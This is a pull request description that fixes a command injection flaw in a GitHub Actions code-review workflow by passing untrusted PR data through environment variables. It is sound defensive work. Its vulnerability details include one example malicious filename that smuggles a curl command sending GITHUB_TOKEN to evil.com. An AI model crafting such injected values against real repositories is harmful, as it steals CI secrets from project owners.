fix: prevent command injection in CI workflow

[lgallard]

Summary

• Fixes command injection vulnerability in .github/workflows/claude-code-review.yml reported in [Security] Security issue in your GitHub CI workflow YAML files #325
• Replaces all direct ${{ }} expression interpolation of attacker-controlled data in run: shell blocks with env: variable mappings
• Attacker-controlled inputs (PR filenames, commit messages, author names, branch refs) are now safely passed as environment variables instead of being spliced into shell commands

Vulnerability Details

Attack vector: An attacker could craft malicious PR filenames (e.g., $(curl evil.com/exfil?t=$GITHUB_TOKEN).tf) or commit messages containing shell metacharacters. When these values were interpolated via ${{ }} directly into run: blocks, the shell would execute the injected commands.

Affected steps (now fixed):

• Workflow Summary (CRITICAL) — commit_message, commit_author, changed_files were directly interpolated into echo commands
• Refresh git state (MEDIUM) — pr_head_ref was directly interpolated into git commands
• Verify commit SHA — github.event_name and step outputs used directly
• Get PR information — Event data (base.ref, issue.number) used directly
• Get PR information for checkout — Issue number and API URL used directly
• Parse comment command — Event name used directly
• Get changed files — Step outputs used directly

Fix Pattern

# BEFORE (vulnerable):
run: echo "${{ steps.foo.outputs.bar }}"

# AFTER (safe):
env:
  BAR: ${{ steps.foo.outputs.bar }}
run: echo "$BAR"

Test plan

• YAML syntax validated
• All pre-commit hooks pass
• Verify workflow triggers correctly on PR comments (codebot hunt)
• Verify workflow summary renders correctly
• Verify git state refresh works for issue_comment events

Closes #325